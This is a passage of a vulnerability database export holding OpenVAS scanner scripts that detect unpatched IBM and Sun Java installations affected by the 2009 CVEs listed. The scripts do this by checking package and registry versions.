Java must be restarted for this update to take effect.", "modified": "2018-04-06T00:00:00", "published": "2009-12-14T00:00:00", "id": "OPENVAS:136141256231066469", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066469", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1643", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1643.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1643 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1643.\n\nThe IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. All running\ninstances of IBM Java must be restarted for this update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. 
To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66469\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1643\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1643.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm\", rpm:\"java-1.4.2-ibm~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-demo\", rpm:\"java-1.4.2-ibm-demo~1.4.2.13.3~1jpp.1.el3\", 
rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-devel\", rpm:\"java-1.4.2-ibm-devel~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-jdbc\", rpm:\"java-1.4.2-ibm-jdbc~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-plugin\", rpm:\"java-1.4.2-ibm-plugin~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-src\", rpm:\"java-1.4.2-ibm-src~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm\", rpm:\"java-1.4.2-ibm~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-demo\", rpm:\"java-1.4.2-ibm-demo~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-devel\", rpm:\"java-1.4.2-ibm-devel~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-javacomm\", rpm:\"java-1.4.2-ibm-javacomm~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-jdbc\", rpm:\"java-1.4.2-ibm-jdbc~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-plugin\", rpm:\"java-1.4.2-ibm-plugin~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-src\", rpm:\"java-1.4.2-ibm-src~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm\", rpm:\"java-1.4.2-ibm~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-demo\", rpm:\"java-1.4.2-ibm-demo~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += 
res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-devel\", rpm:\"java-1.4.2-ibm-devel~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-javacomm\", rpm:\"java-1.4.2-ibm-javacomm~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-jdbc\", rpm:\"java-1.4.2-ibm-jdbc~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-plugin\", rpm:\"java-1.4.2-ibm-plugin~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-src\", rpm:\"java-1.4.2-ibm-src~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:40:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "This host is installed with Sun Java JDK/JRE and is prone to\n Multiple Vulnerabilities.", "modified": "2018-12-04T00:00:00", "published": "2009-11-13T00:00:00", "id": "OPENVAS:1361412562310800972", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800972", "type": "openvas", "title": "Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_sun_java_jre_mult_vuln_nov09_win.nasl 12635 2018-12-04 08:00:20Z cfischer $\n#\n# Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Windows)\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone 
Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800972\");\n script_version(\"$Revision: 12635 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-04 09:00:20 +0100 (Tue, 04 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-13 15:48:12 +0100 (Fri, 13 Nov 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-3877\", \"CVE-2009-3876\", \"CVE-2009-3875\", \"CVE-2009-3873\",\n \"CVE-2009-3874\", \"CVE-2009-3872\", \"CVE-2009-3871\", \"CVE-2009-3869\",\n \"CVE-2009-3868\", \"CVE-2009-3867\");\n script_bugtraq_id(36881);\n script_name(\"Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37231\");\n script_xref(name:\"URL\", value:\"http://java.sun.com/javase/6/webnotes/6u17.html\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/3131\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n 
script_dependencies(\"gb_java_prdts_detect_portable_win.nasl\");\n script_mandatory_keys(\"Sun/Java/JDK_or_JRE/Win/installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows remote attacker to execute arbitrary code,\n gain escalated privileges, bypass security restrictions and cause denial\n of service attacks inside the context of the affected system.\");\n\n script_tag(name:\"affected\", value:\"Sun Java JDK/JRE 6 prior to 6 Update 17\n\n Sun Java JDK/JRE 5 prior to 5 Update 22\n\n Sun Java JDK/JRE 1.4.x prior to 1.4.2_24\n\n Sun Java JDK/JRE 1.3.x prior to 1.3.1_27 on Windows.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws occur due to,\n\n - Error when decoding 'DER' encoded data and parsing HTTP headers.\n\n - Error when verifying 'HMAC' digests.\n\n - Integer overflow error in the 'JPEG JFIF' Decoder while processing\n malicious image files.\n\n - A buffer overflow error in the 'setDiffICM()' and 'setBytePixels()'\n functions in the Abstract Window Toolkit (AWT).\n\n - Unspecified error due to improper parsing of color profiles of images.\n\n - A buffer overflow error due to improper implementation of the\n 'HsbParser.getSoundBank()' function.\n\n - Three unspecified errors when processing audio or image files.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to JDK/JRE version 6 Update 17 or later.\n\n Upgrade to JDK/JRE version 5 Update 22\n\n Upgrade to JDK/JRE version 1.4.2_24\n\n Upgrade to JDK/JRE version 1.3.1_27.\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Sun Java JDK/JRE and is prone to\n Multiple Vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nver = get_kb_item(\"Sun/Java/JRE/Win/Ver\");\nif(!ver)\n ver = get_kb_item(\"Sun/Java/JDK/Win/Ver\");\n\nif(!ver || ver !~ \"^1\\.[3-6]\\.\")\n exit(0);\n\nif(version_in_range(version:ver, 
test_version:\"1.3\", test_version2:\"1.3.1.26\")||\n version_in_range(version:ver, test_version:\"1.4\", test_version2:\"1.4.2.23\")||\n version_in_range(version:ver, test_version:\"1.5\", test_version2:\"1.5.0.21\")||\n version_in_range(version:ver, test_version:\"1.6\", test_version2:\"1.6.0.16\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-11-13T12:59:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "This host is installed with Sun Java JDK/JRE and is prone to\n Multiple Vulnerabilities.", "modified": "2017-11-08T00:00:00", "published": "2009-11-13T00:00:00", "id": "OPENVAS:800972", "href": "http://plugins.openvas.org/nasl.php?oid=800972", "type": "openvas", "title": "Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_sun_java_jre_mult_vuln_nov09_win.nasl 7699 2017-11-08 12:10:34Z santu $\n#\n# Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Windows)\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation allows remote attacker to execute arbitrary code,\n gain escalated privileges, bypass security restrictions and cause denial\n of service attacks inside the context of the affected system.\n Impact Level: System/Application.\";\ntag_affected = \"Sun Java JDK/JRE 6 prior to 6 Update 17\n Sun Java JDK/JRE 5 prior to 5 Update 22\n Sun Java JDK/JRE 1.4.x prior to 1.4.2_24\n Sun Java JDK/JRE 1.3.x prior to 1.3.1_27 on Windows.\";\ntag_insight = \"Multiple flaws occur due to,\n - Error when decoding 'DER' encoded data and parsing HTTP headers.\n - Error when verifying 'HMAC' digests.\n - Integer overflow error in the 'JPEG JFIF' Decoder while processing\n malicious image files.\n - A buffer overflow error in the 'setDiffICM()' and 'setBytePixels()'\n functions in the Abstract Window Toolkit (AWT).\n - Unspecified error due to improper parsing of color profiles of images.\n - A buffer overflow error due to improper implementation of the\n 'HsbParser.getSoundBank()' function.\n - Three unspecified errors when processing audio or image files.\";\ntag_solution = \"Upgrade to JDK/JRE version 6 Update 17 or later.\n http://java.sun.com/javase/downloads/index.jsp\n OR\n Upgrade to JDK/JRE version 5 Update 22\n http://java.sun.com/javase/downloads/index_jdk5.jsp\n OR\n Upgrade to JDK/JRE version 1.4.2_24\n http://java.sun.com/j2se/1.4.2/download.html\n OR\n Upgrade to JDK/JRE version 1.3.1_27\n http://java.sun.com/j2se/1.3/download.html\";\ntag_summary = \"This host is installed with Sun Java JDK/JRE and is prone to\n Multiple Vulnerabilities.\";\n\nif(description)\n{\n script_id(800972);\n 
script_version(\"$Revision: 7699 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-11-08 13:10:34 +0100 (Wed, 08 Nov 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-13 15:48:12 +0100 (Fri, 13 Nov 2009)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2009-3877\", \"CVE-2009-3876\", \"CVE-2009-3875\", \"CVE-2009-3873\",\n \"CVE-2009-3874\", \"CVE-2009-3872\", \"CVE-2009-3871\", \"CVE-2009-3869\",\n \"CVE-2009-3868\", \"CVE-2009-3867\");\n script_bugtraq_id(36881);\n script_name(\"Sun Java JDK/JRE Multiple Vulnerabilities - Nov09 (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/37231\");\n script_xref(name : \"URL\" , value : \"http://java.sun.com/javase/6/webnotes/6u17.html\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/3131\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_java_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Sun/Java/JDK_or_JRE/Win/installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\ni = 0;\nif(jreVer = get_kb_item(\"Sun/Java/JRE/Win/Ver\")) {\n version[i] = jreVer;\n i++;\n}\n\nif(jdkVer = get_kb_item(\"Sun/Java/JDK/Win/Ver\")) {\n version[i] = jdkVer;\n}\n\nforeach ver (version)\n{\n if(ver)\n {\n # Check for 1.3 < 1.3.1_27, 1.4 < 1.4.2_24, 1.5 < 1.5.0_22 (5 Update 22),\n # and 1.6 < 1.6.0_17 (6 Update 17)\n 
if(version_in_range(version:ver, test_version:\"1.3\", test_version2:\"1.3.1.26\")||\n version_in_range(version:ver, test_version:\"1.4\", test_version2:\"1.4.2.23\")||\n version_in_range(version:ver, test_version:\"1.5\", test_version2:\"1.5.0.21\")||\n version_in_range(version:ver, test_version:\"1.6\", test_version2:\"1.6.0.16\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3877", "CVE-2009-3868"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1643.\n\nThe IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. 
All running\ninstances of IBM Java must be restarted for this update to take effect.", "modified": "2017-07-12T00:00:00", "published": "2009-12-14T00:00:00", "id": "OPENVAS:66469", "href": "http://plugins.openvas.org/nasl.php?oid=66469", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1643", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1643.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1643 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1643.\n\nThe IBM 1.4.2 SR13-FP3 Java release includes the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. 
(CVE-2009-3867, CVE-2009-3868, CVE-2009-3869,\nCVE-2009-3871, CVE-2009-3872, CVE-2009-3873, CVE-2009-3874, CVE-2009-3875,\nCVE-2009-3876, CVE-2009-3877)\n\nAll users of java-1.4.2-ibm are advised to upgrade to these updated\npackages, which contain the IBM 1.4.2 SR13-FP3 Java release. All running\ninstances of IBM Java must be restarted for this update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(66469);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-14 23:06:43 +0100 (Mon, 14 Dec 2009)\");\n script_cve_id(\"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1643\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1643.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm\", rpm:\"java-1.4.2-ibm~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-demo\", rpm:\"java-1.4.2-ibm-demo~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-devel\", rpm:\"java-1.4.2-ibm-devel~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-jdbc\", rpm:\"java-1.4.2-ibm-jdbc~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-plugin\", rpm:\"java-1.4.2-ibm-plugin~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-src\", rpm:\"java-1.4.2-ibm-src~1.4.2.13.3~1jpp.1.el3\", rls:\"RHENT_3\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm\", rpm:\"java-1.4.2-ibm~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-demo\", rpm:\"java-1.4.2-ibm-demo~1.4.2.13.3~1jpp.1.el4\", 
rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-devel\", rpm:\"java-1.4.2-ibm-devel~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-javacomm\", rpm:\"java-1.4.2-ibm-javacomm~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-jdbc\", rpm:\"java-1.4.2-ibm-jdbc~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-plugin\", rpm:\"java-1.4.2-ibm-plugin~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-src\", rpm:\"java-1.4.2-ibm-src~1.4.2.13.3~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm\", rpm:\"java-1.4.2-ibm~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-demo\", rpm:\"java-1.4.2-ibm-demo~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-devel\", rpm:\"java-1.4.2-ibm-devel~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-javacomm\", rpm:\"java-1.4.2-ibm-javacomm~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-jdbc\", rpm:\"java-1.4.2-ibm-jdbc~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-plugin\", rpm:\"java-1.4.2-ibm-plugin~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.4.2-ibm-src\", rpm:\"java-1.4.2-ibm-src~1.4.2.13.3~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", 
